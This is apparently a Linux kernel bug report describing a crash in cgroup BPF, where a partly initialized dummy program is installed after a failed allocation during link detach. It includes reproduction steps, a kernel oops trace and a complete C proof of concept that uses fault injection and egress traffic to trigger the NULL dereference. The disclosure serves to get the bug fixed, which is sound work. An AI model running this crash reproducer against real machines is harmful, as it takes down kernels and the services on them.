Our fuzzer discovered that a kernel paging request fault can occur when
an incompletely initialized `dummy_bpf_prog.prog` (only `bpf_func` is
set) is installed into `cgrp->bpf.effective[atype]`. Subsequent
accesses—such as `prog->stats`—may then dereference NULL pointers and
crash the kernel.
`dummy_bpf_prog.prog` is used as a substitute when
`bpf_prog_array_alloc` fails, but only `bpf_func` is populated. Other
program fields (notably `stats`) remain NULL. During `BPF_LINK_DETACH`,
if `bpf_prog_array_alloc` fails (e.g. due to memory exhaustion or a
failslab injection), `dummy_bpf_prog.prog` can replace the previous
`old_prog` in `cgrp->bpf.effective[atype]`. Subsequent BPF program
execution may access `dummy_bpf_prog.prog.stats`, which is never
initialized (NULL), causing an kernel panic (unable to handle kernel
paging request).
Reported-by: Yinhao Hu <
ddd...@hust.edu.cn>
Reported-by: Kaiyan Mei <
M2024...@hust.edu.cn>
Reviewed-by: Dongliang Mu <
dz...@hust.edu.cn>
## Reproduction steps
1. Enable BPF runtime statistics so that the stats-enabled code path is
exercised.
2. Load a minimal BPF program and create a BPF link attached to
`BPF_CGROUP_INET_EGRESS`.
3. Configure a failslab / fault injection so that `bpf_prog_array_alloc`
is likely to fail during detach.
4. Detach the BPF link. If `bpf_prog_array_alloc` fails, the kernel will
insert `dummy_bpf_prog.prog` into the cgroup `bpf.effective` array.
5. Send a socket packet that triggers the cgroup egress BPF program —
the kernel will attempt to run the dummy prog and dereference NULL
fields (e.g. `prog->stats`), causing a crash.
---
## KASAN report
```yaml
[ 11.233750] BUG: unable to handle page fault for address:
ffff8881911f8000
[ 11.281523] #PF: supervisor write access in kernel mode
[ 11.282126] #PF: error_code(0x0002) - not-present page
[ 11.282725] PGD 9e01067 P4D 9e01067 PUD 0
[ 11.283214] Oops: Oops: 0002 [#1] SMP KASAN NOPTI
[ 11.283768] CPU: 0 UID: 1000 PID: 334 Comm: sshd Not tainted
6.18.0-rc4-next-20251107 #8 PREEMPT(none)
[ 11.284831] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX,
1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 11.285894] RIP: 0010:__cgroup_bpf_run_filter_skb+0xf46/0x15d0
[ 11.286306] Code: d9 cb 86 48 be 00 00 00 00 00 fc ff df 49 89 fb 49
c1 eb 03 41 80 3c 33 00 0f 85 cf 05 00 00 48 03 0c c5 a0 d9 cb 86 48 89
c8 <48> ff 01 48 8b 4c 24 78 48 01 48 08 e9 6e f9 ff ff bf 01 00 00 00
[ 11.287590] RSP: 0018:ffff8881142ef000 EFLAGS: 00010286
[ 11.287965] RAX: ffff8881911f8000 RBX: ffff88811757bc60 RCX:
ffff8881911f8000
[ 11.288462] RDX: 0000000000000001 RSI: dffffc0000000000 RDI:
ffffffff86cbd9a0
[ 11.288961] RBP: ffffffff879d90c2 R08: 0000000000000001 R09:
0000000000000001
[ 11.289453] R10: 0000000080000000 R11: 1ffffffff0d97b34 R12:
ffff8881128d5c10
[ 11.289952] R13: dffffc0000000000 R14: ffffffff879d90c0 R15:
ffff8881142ef0d8
[ 11.290455] FS: 00007cc4577f0900(0000) GS:ffff8881911f8000(0000)
knlGS:0000000000000000
[ 11.291018] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 11.291428] CR2: ffff8881911f8000 CR3: 00000001030ea000 CR4:
0000000000750ef0
[ 11.291927] PKRU: 55555554
[ 11.292125] Call Trace:
[ 11.292305] <TASK>
[ 11.292809] ? __pfx___cgroup_bpf_run_filter_skb+0x10/0x10
[ 11.293201] ip_finish_output+0x1ee/0x320
[ 11.293493] ip_output+0x170/0x2e0
[ 11.293740] ? __pfx_ip_output+0x10/0x10
[ 11.294022] ? __pfx_stack_trace_save+0x10/0x10
[ 11.294344] ? __pfx_ip_finish_output+0x10/0x10
[ 11.294674] ? kasan_save_track+0x10/0x30
[ 11.295305] ? ipv4_dst_check+0x10b/0x160
[ 11.295598] __ip_queue_xmit+0xcfc/0x1d60
[ 11.296230] ? __skb_clone+0x555/0x740
[ 11.296508] __tcp_transmit_skb+0x2c54/0x3de0
[ 11.296830] ? __pfx___tcp_transmit_skb+0x10/0x10
[ 11.298200] ? try_charge_memcg+0x27c/0xc10
[ 11.298848] tcp_write_xmit+0x12dd/0x7e20
[ 11.299478] ? mem_cgroup_sk_charge+0x9b/0xe0
[ 11.299794] ? preempt_count_add+0x77/0x150
[ 11.300434] ? __virt_addr_valid+0x1d0/0x2d0
[ 11.300745] __tcp_push_pending_frames+0x90/0x2f0
[ 11.301077] tcp_sendmsg_locked+0x1374/0x45e0
[ 11.301394] ? __pfx_tcp_sendmsg_locked+0x10/0x10
[ 11.301731] ? __pfx_aa_file_perm+0x10/0x10
[ 11.302715] ? _raw_spin_lock_bh+0x86/0xe0
[ 11.303010] tcp_sendmsg+0x27/0x40
[ 11.303261] sock_write_iter+0x474/0x590
[ 11.303885] ? __pfx_sock_write_iter+0x10/0x10
[ 11.304549] ? security_file_permission+0x7a/0xe0
[ 11.305299] ? rw_verify_area+0x6d/0x450
[ 11.305658] vfs_write+0xa95/0xde0
[ 11.305953] ? _raw_spin_lock_irq+0x8c/0xe0
[ 11.306314] ? __pfx_vfs_write+0x10/0x10
[ 11.307043] ? __pfx__raw_spin_lock_irq+0x10/0x10
[ 11.307834] ? fdget_pos+0x54/0x4b0
[ 11.308143] ksys_write+0x17d/0x1c0
[ 11.308440] ? __pfx_ksys_write+0x10/0x10
[ 11.308785] ? __x64_sys_rt_sigprocmask+0x188/0x230
[ 11.309202] ? __pfx___x64_sys_rt_sigprocmask+0x10/0x10
[ 11.309621] do_syscall_64+0x76/0x6b0
[ 11.309926] ? ksys_write+0x17d/0x1c0
[ 11.310640] ? do_syscall_64+0xa2/0x6b0
[ 11.311339] ? __x64_sys_select+0xb9/0x150
[ 11.311687] ? __pfx_kern_select+0x10/0x10
[ 11.312417] ? do_syscall_64+0xa2/0x6b0
[ 11.312726] ? vfs_read+0x6e2/0xa20
[ 11.313817] ? _raw_spin_lock_irq+0x8c/0xe0
[ 11.314173] ? __pfx__raw_spin_lock_irq+0x10/0x10
[ 11.314956] ? __task_pid_nr_ns+0x130/0x2a0
[ 11.316134] ? _raw_spin_lock_irq+0x8c/0xe0
[ 11.316488] ? __pfx__raw_spin_lock_irq+0x10/0x10
[ 11.316866] ? __pfx_sigprocmask+0x10/0x10
[ 11.317618] ? recalc_sigpending+0x16c/0x220
[ 11.318733] ? sigprocmask+0x17e/0x330
[ 11.319046] ? __pfx_sigprocmask+0x10/0x10
[ 11.320143] ? __x64_sys_rt_sigprocmask+0x16d/0x230
[ 11.320539] ? __pfx___x64_sys_rt_sigprocmask+0x10/0x10
[ 11.321360] ? do_syscall_64+0xa2/0x6b0
[ 11.322490] ? do_syscall_64+0xa2/0x6b0
[ 11.322811] ? switch_fpu_return+0xf6/0x200
[ 11.323519] ? do_syscall_64+0x24c/0x6b0
[ 11.324223] ? do_syscall_64+0xa2/0x6b0
[ 11.324937] ? do_syscall_64+0xa2/0x6b0
[ 11.325657] ? do_syscall_64+0xa2/0x6b0
[ 11.325959] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[ 11.326359] RIP: 0033:0x7cc457c3d513
[ 11.326665] Code: 8b 15 81 29 0e 00 f7 d8 64 89 02 48 c7 c0 ff ff ff
ff eb b7 0f 1f 00 64 8b 04 25 18 00 00 00 85 c0 75 14 b8 01 00 00 00 0f
05 <48> 3d 00 f0 ff ff 77 55 c3 0f 1f 40 00 48 83 ec 28 48 89 54 24 18
[ 11.328137] RSP: 002b:00007ffda89c3148 EFLAGS: 00000246 ORIG_RAX:
0000000000000001
[ 11.328749] RAX: ffffffffffffffda RBX: 000000000000004c RCX:
00007cc457c3d513
[ 11.329327] RDX: 000000000000004c RSI: 00005be29ed1f530 RDI:
0000000000000004
[ 11.329904] RBP: 00005be29ed554b0 R08: 000000050cfc1417 R09:
0000000000000200
[ 11.330488] R10: 00007cc458377000 R11: 0000000000000246 R12:
00005be274a26768
[ 11.331047] R13: 0000000000000000 R14: 0000000000000004 R15:
00005be2749dbac0
[ 11.331616] </TASK>
[ 11.331793] Modules linked in:
[ 11.332055] CR2: ffff8881911f8000
[ 11.332339] ---[ end trace 0000000000000000 ]---
```
---
## Proof of Concept
The following C program demonstrates the issue on a linux-next
6.18.0-rc4-next-20251107:
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <pthread.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sched.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/bpf.h>
static inline int sys_bpf(enum bpf_cmd cmd, union bpf_attr *attr,
unsigned int size) {
return syscall(__NR_bpf, cmd, attr, size);
}
void* traffic_thread(void *arg) {
int sock;
struct sockaddr_in addr = {0};
char buf[1024] = "GET / HTTP/1.0\r\n\r\n";
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) return NULL;
int opt = 1;
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));
int flags = fcntl(sock, F_GETFL, 0);
fcntl(sock, F_SETFL, flags | O_NONBLOCK);
addr.sin_family = AF_INET;
addr.sin_port = htons(80);
inet_pton(AF_INET, "8.8.8.8", &addr.sin_addr);
connect(sock, (struct sockaddr*)&addr, sizeof(addr));
send(sock, buf, strlen(buf), MSG_DONTWAIT);
close(sock);
return NULL;
}
int main() {
int cgroup_fd, prog_fd, link_fd;
union bpf_attr attr;
cgroup_fd = open("/sys/fs/cgroup", O_RDONLY | O_DIRECTORY);
if (cgroup_fd < 0) {
perror("open cgroup");
return 1;
}
struct bpf_insn prog[] = {
{ 0xb7, 0, 0, 0, 1 }, /* r0 = 1 */
{ 0x95, 0, 0, 0, 0 } /* exit */
};
/* Create BPF program */
memset(&attr, 0, sizeof(attr));
attr.prog_type = BPF_PROG_TYPE_CGROUP_SKB;
attr.insn_cnt = sizeof(prog) / sizeof(prog[0]);
attr.insns = (unsigned long)prog;
attr.license = (unsigned long)"GPL";
prog_fd = sys_bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
if (prog_fd < 0) {
perror("BPF_PROG_LOAD");
close(cgroup_fd);
return 1;
}
/* Create link and attach to cgroup */
memset(&attr, 0, sizeof(attr));
attr.link_create.prog_fd = prog_fd;
attr.link_create.target_fd = cgroup_fd;
attr.link_create.attach_type = BPF_CGROUP_INET_EGRESS;
link_fd = sys_bpf(BPF_LINK_CREATE, &attr, sizeof(attr));
if (link_fd < 0) {
perror("BPF_LINK_CREATE");
close(prog_fd);
close(cgroup_fd);
return 1;
}
/* Enable BPF runtime statistics (so stats-enabled paths run) */
memset(&attr, 0, sizeof(attr));
attr.enable_stats.type = BPF_STATS_RUN_TIME;
int stats_fd = sys_bpf(BPF_ENABLE_STATS, &attr, sizeof(attr));
if (stats_fd < 0) {
printf("[!] Warning: Failed to enable BPF stats (errno=%d). The
crash path may not trigger.\n", errno);
} else {
printf("[+] BPF runtime statistics enabled (fd=%d)\n", stats_fd);
}
/* Enable failslab / fault injection to make allocation fail */
int failslab_fd = open("/sys/kernel/debug/failslab/ignore-gfp-wait",
O_WRONLY);
if (failslab_fd >= 0) {
write(failslab_fd, "N", 1);
close(failslab_fd);
printf("[+] Set ignore-gfp-wait=N\n");
}
int fail_fd = open("/proc/self/fail-nth", O_WRONLY);
if (fail_fd >= 0) {
write(fail_fd, "3", 1);
close(fail_fd);
}
/* Detach the link. If allocation fails inside the kernel,
dummy_bpf_prog.prog may be installed. */
memset(&attr, 0, sizeof(attr));
attr.link_detach.link_fd = link_fd;
sys_bpf(BPF_LINK_DETACH, &attr, sizeof(attr));
/* Send traffic to trigger the cgroup egress BPF path that will run
the dummy prog */
traffic_thread(NULL);
close(link_fd);
close(prog_fd);
close(cgroup_fd);
return 0;
}
```